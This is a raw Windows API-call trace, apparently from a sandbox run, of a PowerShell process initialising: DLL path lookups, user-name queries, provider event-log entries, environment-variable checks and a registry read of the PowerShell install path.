	[0219.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.219] CoTaskMemAlloc (cb=0x804) returned 0x1b922f40
	[0219.219] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b922f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0219.220] CoTaskMemFree (pv=0x1b922f40) 
	[0219.220] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0219.220] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0219.220] CoTaskMemFree (pv=0x1f89c0) 
	[0219.220] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef9e28*="Registry", lpRawData=0x2ef9bb8) returned 1
	[0219.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.566] CoTaskMemAlloc (cb=0x804) returned 0x1b922f40
	[0219.567] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b922f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0219.567] CoTaskMemFree (pv=0x1b922f40) 
	[0219.567] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0219.567] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0219.567] CoTaskMemFree (pv=0x1f89c0) 
	[0219.567] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eff1f0*="Variable", lpRawData=0x2efef80) returned 1
	[0219.652] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0219.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.652] CoTaskMemFree (pv=0x215590) 
	[0219.654] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0219.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.654] CoTaskMemFree (pv=0x215590) 
	[0219.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x13ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0221.801] CoTaskMemAlloc (cb=0x804) returned 0x1b922f40
	[0221.801] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b922f40, nSize=0x13d618 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d618) returned 0x1
	[0221.801] CoTaskMemFree (pv=0x1b922f40) 
	[0221.801] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0221.801] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d658 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d658) returned 1
	[0221.801] CoTaskMemFree (pv=0x1f89c0) 
	[0221.802] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f12db8*="Certificate", lpRawData=0x2f12b48) returned 1
	[0222.463] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.463] CoTaskMemFree (pv=0x215590) 
	[0222.466] GetLogicalDrives () returned 0x4
	[0222.466] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x13d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.466] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0222.467] CoTaskMemAlloc (cb=0x20e) returned 0x1b8fb240
	[0222.467] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8fb240 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0222.467] CoTaskMemFree (pv=0x1b8fb240) 
	[0222.468] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.468] CoTaskMemFree (pv=0x215590) 
	[0222.468] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.468] CoTaskMemFree (pv=0x215590) 
	[0222.484] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.484] CoTaskMemFree (pv=0x215590) 
	[0222.490] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.490] CoTaskMemFree (pv=0x215590) 
	[0222.492] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x13d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.492] SetErrorMode (uMode=0x1) returned 0x1
	[0222.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x13d260 | out: lpFileInformation=0x13d260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.492] SetErrorMode (uMode=0x1) returned 0x1
	[0222.492] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x13d000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.492] SetErrorMode (uMode=0x1) returned 0x1
	[0222.492] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x13d260 | out: lpFileInformation=0x13d260*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.492] SetErrorMode (uMode=0x1) returned 0x1
	[0222.494] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0222.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.494] CoTaskMemFree (pv=0x215590) 
	[0223.209] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x13d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.226] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x13d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0223.226] SetErrorMode (uMode=0x1) returned 0x1
	[0223.226] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x13d520 | out: lpFileInformation=0x13d520*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0223.226] SetErrorMode (uMode=0x1) returned 0x1
	[0227.951] CoTaskMemAlloc (cb=0x804) returned 0x1b922f40
	[0227.952] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b922f40, nSize=0x13d888 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x13d888) returned 0x1
	[0227.952] CoTaskMemFree (pv=0x1b922f40) 
	[0227.952] CoTaskMemAlloc (cb=0x204) returned 0x1f89c0
	[0227.952] GetUserNameW (in: lpBuffer=0x1f89c0, pcbBuffer=0x13d8c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x13d8c8) returned 1
	[0227.952] CoTaskMemFree (pv=0x1f89c0) 
	[0227.954] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4fe80*="Available", lpRawData=0x2f4fc10) returned 1
	[0228.262] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0228.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.262] CoTaskMemFree (pv=0x215590) 
	[0228.263] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0228.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.263] CoTaskMemFree (pv=0x215590) 
	[0228.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.269] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0228.269] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.269] CoTaskMemFree (pv=0x215590) 
	[0228.269] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0228.269] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0228.269] CoTaskMemFree (pv=0x215590) 
	[0228.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.271] GetCurrentProcessId () returned 0xafc
	[0228.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.290] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13d8a8 | out: phkResult=0x13d8a8*=0x37c) returned 0x0
	[0228.290] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13d82c, lpData=0x0, lpcbData=0x13d828*=0x0 | out: lpType=0x13d82c*=0x1, lpData=0x0, lpcbData=0x13d828*=0x56) returned 0x0
	[0228.290] CoTaskMemAlloc (cb=0x5a) returned 0x1b8fa0f0
	[0228.290] RegQueryValueExW (in: hKey=0x37c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13d7fc, lpData=0x1b8fa0f0, lpcbData=0x13d7f8*=0x56 | out: lpType=0x13d7fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x13d7f8*=0x56) returned 0x0
	[0228.292] RegCloseKey (hKey=0x37c) returned 0x0
	[0228.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
